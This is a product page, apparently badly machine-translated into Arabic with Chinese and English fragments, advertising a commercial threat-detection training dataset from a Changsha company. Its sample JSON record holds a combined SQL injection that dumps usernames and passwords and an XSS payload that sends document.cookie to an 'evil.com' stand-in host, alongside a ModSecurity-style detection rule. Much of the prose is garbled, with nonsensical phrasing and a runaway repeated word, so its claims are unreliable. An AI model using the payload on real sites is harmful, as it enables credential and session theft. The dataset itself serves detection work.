مجموعة بيانات قاعدة بيانات تحديد التهديدات الشاملة

000 50 ألف من البيانات المتعلقة بكشف التهديدات من نوع متعدد؟ SQLi/XSS/RCE/DDoS/ weight/cloud security wide coverage ?

4-6周
دورة التسليم
قواعد XML
قواعد الكشف الهيكلي
حركة المرور
الشبكة الحقيقية
HTTP Reconstruction
الطلب/نص الاستجابة
2-4 أسابيع
دورة التسليم

لمحة عامة عن البيانات

التعريف:مجموعة بيانات قاعدة بيانات تحديد التهديدات الشاملةمقدم منشركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودةThe large multi-type threat detection data set built by the security laboratory.قواعد XML + حركة المرور + HTTP Reconstructed Text + 攻击النوع标签 + الحقيقة الأرضيةويوفر هيكل الجمعيات المؤلف من خمسة مستويات، الذي يغطي الهجوم على الشبكة (SQLi/XSS/RCE/LFI/SRF)، والهجوم السيبراني (DDOS/Scans/C2)، والهجوم على الحاسوب الرئيسي (التعبئة/الاستمرار)، والهجوم الأمني السحابي، والهجوم على نظام المعلومات الإدارية المتكامل، والاختراق اليومي/يومي، باستخدام ست فئات تهديد واسعة النطاق، خريطة إطارية لنظام أطلس (تغطي 14 تكتيكا نموذجية) ومصممة للتدريب الشامل.

اسم البياناتمجموعة بيانات قاعدة بيانات تحديد التهديدات الشاملة
مجموع حجم البيانات2,000~50,000条
نوع البياناتخمسة:قواعد XML + حركة المرور + HTTP Reconstructed Text + 攻击النوع标签 + الحقيقة الأرضية
المصدرLonghui Security Laboratory + Multi-source Threat Information (OTX/AlienVault/MISP) + Laundry Platform
نوع الترخيصالتراخيص التجارية مرفق وثائق التفويض الكاملة
دورة التسليم4-6周
威胁类别هجمات على الشبكة (تحميل SQLi/XSS/LFI/SSRF/document/XXE)، والهجمات الإلكترونية (DDDOS/port scan/C2) ونفقات الحاسوب الرئيسي (ترفع/تستمر/تجريب/تغطية)، والهجمات الأمنية السحابية (S3-pass/MDSv1، وأجهزة استخدام/IAM)، والهجمات التي شنها التحالف الدولي لمنع التمييز ضد المرأة (الاعتداء على حقن/التوقيت
ATTCK Mappingخريطة تكتيكية كاملة: إعادة تشكيل، تنمية الموارد، الوصول الداخلي، التنفيذ، السياسات، الوصول الخاص، رؤية الدفاع، الوصول إلى الكريستال، الاكتشاف، الحركة اللاحق، الخلاص، الاختراق، الاصطدام، الأثر
الناتجJSONL / CSV / Excel / PCAP
اللغةاللغة الصينية والإنكليزية

مجالات البيانات الأساسية

وتتضمن كل بيانات ست فئات من فئات تحديد القواعد، وقواعد الكشف عن الألغام غير المنفجرة، وحمولة الهجوم، واستعادة برنامج نقل الأسلحة البشرية للنص، وحركة المرور في برنامج عمل بربادوس، وإجابات موحدة تغطي الحلقة المغلقة الكاملة من تعريف القواعد إلى تقييم المصادقة.

الفئة الميدانيةالعدة الميدانيةالمجالات النموذجية
تعريف القاعدة4القاعدة (القاعدة _KEEP_core_ID)، القاعدة - الاسم (اسم القاعدة)، التهديد - الفئة (الفئة العمرية من التهديد)، الشدة (المستوى الخطير: CC/High/Medium/Low)
XML Detection Rules3القاعدة xml (قاعدة الشائعات/Suricata/ModSecurityXML)، المادة /التوقيع (توقيع القاعدة)، القاعدة /منابر قابلة للتطبيق: NIDS/WAF/HIDS)
حمولة الهجوم4حمولة (خطة تحميل) تهديد - الفئة (علامة تصنيف المخاطر)، التهديد - المستوى (1-5)، الرمز - نوع (طريقة الترميز)
HTTP Reconstructed Text3http_request (full HTTP request), http_response (full HTTP response), protocol_info (agreement information: HTTP/1.1/HTTTP2/gRPC)
حركة المرور4كبف - كبف (كبل (كومب) وكمية (حجم) وحزمة - فرز (عدد مجموعات البيانات) وتدفق - ضمان)
الحقيقة الأرضية5(سواء كان الهجوم أو لم يهاجم: صحيح/مرتب)، الهجوم - نوع (نوع محدد من الهجوم)، مشروع قانون - chain_face (القتل/النشر/المعلومات/C2/Actions)، التقنيات - (قائمة الصلات بالهوية التقنية لشبكة " تاتشيك " )، الأثر - أساسي (التقدير 1-10)
وصلات المعلومات المتعلقة بالتهديد3cve_ref (associated CVE number),mitre_group (associated with APT), campaign (associated attack/war name)

عرض عينات البيانات

وفيما يلي عينة منظمة من نوعها " يوبون " بعد التحسس، تبين الشكل النموذجي لبيانات الكشف عن حقن السائل SQL.

{
  "entry_id": "THREAT-2024-012834",
  "rule_id": "THREAT-WEB-0452",
  "rule_name": "Combined SQLi + XSS Attack via Search Endpoint",
  "threat_category": "Web Attack (SQLi + XSS)",
  "severity": "Critical",
  "rule_xml": "<rule id=\"1000001\" phase=\"2\">\n  <operator>multiDetect</operator>\n  <action>block</action>\n  <pattern_sqli>union\\s+(?:all\\s+)?select</pattern_sqli>\n  <pattern_xss><script.*?></pattern_xss>\n  <target>ARGS|REQUEST_BODY</target>\n</rule>",
  "payload": "1' UNION SELECT NULL,username,password FROM users-- <script>new Image().src='http://evil.com/steal?c='+document.cookie</script>",
  "threat_category": "Web Attack",
  "threat_level": 5,
  "encoding_type": "Mixed (SQLi: URL-encoded, XSS: plaintext)",
  "http_request": "GET /search.php?q=1'%20UNION%20SELECT...<script>... HTTP/1.1\r\nHost: target-web.com\r\nCookie: PHPSESSID=abc123\r\n\r\n",
  "http_response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>...admin:$2a$10$hash...&lt;script&gt;new Image().src=...&lt;/script&gt;...</html>",
  "pcap_file": "threat_web_combined_sqli_xss.pcap",
  "pcap_size": "24532",
  "packet_count": 78,
  "technique_ids": ["T1190","T1059.004","T1189"],
  "kill_chain_phase": "Exploitation",
  "impact_score": 9.5,
  "mitre_group": "APT41",
  "cve_ref": "N/A",
  "answer": {
    "is_attack": true,
    "attack_type": "Combined SQLi + Reflected XSS",
    "kill_chain_phase": "Exploitation",
    "impact_score": 9.5
  }
}

السيناريوهات التطبيقية

النموذج الأمني المتكامل قبل التدريب

ويشكل 000 50 من البيانات المتعددة الأنواع عن التهديدات التي تبلغ مساحتها خمسة ميغاهات تغطي الفئات الرئيسية الست للشبكة/الشبكة/الوحدة/الوحدة/الوحدة/اليوم، قاعدة اللغة الكاملة للتدريب السابق على الإدارة الأمنية للأراضي.

نموذج قاعدة الكشف المتعددة المخاطر

The introduction of SQL into the APT attack, the training of a unified multi-threat detection base model for cross-category threat data, and the realization of the One Model for All Threats common security AI structure.

مركز العمليات الأمنية

تم وضع خريطة كاملة لسلسلة " تون " ، وخطة " سي. سي. سي " ، واتسمت بتدريب محللي شركة SOC AI " تلقائياً: تنبيه الشرطة إلى وضع تصنيف للتهديدات وإعادة الاستجابة لتوصيات سلسلة الهجوم آلياً.

الاستجابة الآلية للنشرة

(ب) بيانات التهديد المتعدد الأبعاد عبر الشبكة/الشبكة/الشبكة/الرئيس/الوحدة، وتدريب محركات المبادرة على إجراء تحليل للترابط بين مختلف المواقع الرئيسية، وخفض مسارات الهجوم، ووضع برامج آلية للاستجابة.

ثريات هنت إي

واستنادا إلى مسح تكنولوجيا MTRA TATTCK وربطت منظمة APT البيانات والتدريب على الصيد النشط من أجل التهديدات المحتملة وتحديد أنماط الهجوم الخفية.

التوعية بالحالة الأمنية

Multiple threat data + threat level + impact rating, training Security Situational Awareness AI to assess the overall security posture of the enterprise in real time, generating dynamic risk ratings and predictive alerts.

المشاكل المشتركة

كيف يمكن الحصول على بيانات؟ هل يمكن استخدامها في تدريب العاملين في مجال مكافحة المخدرات؟
هذه المجموعة من البياناتشركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودة(ب) أن توفر إذناً من قطاع الأعمال لتغطية أنشطة التدريب على إدارة الأعمال التجارية وتطوير منتجات السلامة، والبيانات من مختبر لونغ هوي للسلامة ومن مصادر متعددة للاستخبارات المفتوحة عن التهديدات لضمان الامتثال.
تغطية محددة لفئات التهديدات الرئيسية الست؟
(ب) الهجمات الإلكترونية (تحميل SQLi/XSS/RCE/LFI/SSRF/XXE/document)، والهجمات الإلكترونية (DOS/scan/C2/DNSنفق)، والهجمات التي تشنها الحواسيب الرئيسية (حركة الحركة/الحركة الأفقية)، والأمن السحابي (AWS IMDS/S3/IAM)، والهجمات التي تشنهاات التي يقوم بها الفريق العامل المعني بمكافحة الدولية لمكافحة التصحر، والكول، والكول، والكول، والكول، والكول، والتوقيت، والكول، والتوقيت العالمي، والتوقيت العالمي، والتوقيت العالمي، والهومران، والتوقيت العالمي، والتوقيت العالمي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، والشمالي، وال
ما هو اكتمال خريطة (ات سي كي)؟
يوفر خريطة تكتيكية كاملة، كل منها بطاقة هوية تقنية مرتبطة بها من 1 إلى 5، مما يعطي الصلة بين مرحلة سلسلة القتل (المرحلة الأولى من سلسلة القتل) ومجموعة " إي تي " ، ويدعم التصوير البصري للملاحة " TT " .
هل تدعم مجموعات البيانات المشتريات الفرعية حسب فئة التهديد؟
الدعم - يمكن شراء هذا بصورة منفصلة أو مجتمعة حسب الاقتضاء، رهنا بأمن الشبكة (000 15)، وأمن السيبر (000 12)، والأمن المضيف (000 10)، وأمن الكلاود (000 8)، وأمن مكتب التحقيقات الإدارية (000 5).
كيف تحصل على بيانات أو مشورة تجارية؟
هذه المجموعة من البياناتشركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودةويُنفذ برنامجه الخاص بحسابات البيانات، ويُدعم كل من مجموعات البيانات الموحدة وطرائق التكييف حسب الطلب، ويُرجى الاتصال بنا في قائمة بيانات مفصلة، وقائمة العينات الأولية، وخطة اقتباسات.

الحاجة إلى برامج واسعة النطاق متعددة النماذج لكشف التهديدات؟

شركة تشانغشا لانغوي لتكنولوجيا المعلومات المحدودة وتكرس منبر نظام البيانات - آسيا والمحيط الهادئ لتوفير أصول عالية الجودة وممتثلة للبيانات الأمنية على الشبكة لشركات التحقيق ومؤسسات البحوث، وتدعم الجمعات المرنة من النموذج الفرعي لحقن SQL، حسب قاعدة البيانات، وشكل قواعد الكشف.

عينة من البيانات قبل استعراض البرنامج المتكامل للتهديدات